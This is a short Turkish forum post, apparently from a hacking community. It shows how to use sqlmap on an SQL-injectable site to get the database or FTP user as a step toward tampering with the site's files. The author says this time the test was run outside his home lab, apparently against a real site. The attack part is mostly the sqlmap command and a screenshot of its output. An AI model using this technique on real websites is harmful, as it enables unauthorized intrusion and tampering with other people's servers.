Herkese iyi forumlar arkadaşlar, FTP Sunucusu malum bir sitenin tüm dosyalarını barındıran sunucudur, FTP sunucusuna sızıldığı zaman istenilen dosyalarda oynama yapılabilir. Gelin şimdi SQL açıklı bir sitede FTP Kullanıcılarının username'lerini çekmeye bakalım
1. Terminalimizi açıp şu komutu veriyoruz;
Kod:
sqlmap -u "hedef.xxx.php?id=x'" --current-user
2. Gördüğünüz gibi FTP'ye bağlanan kullanıcımız;
[URL='https://i.hizliresim.com/lW08og.png']
[/URL]Normal şartlar altında bu tür Sunucu ile ilgili Pentest olaylarını Local ağımda kurmuş olduğum Lab. Ortamlarında yapmaya çalışıyorum bu sefer küçük bir istisna yapalım dedim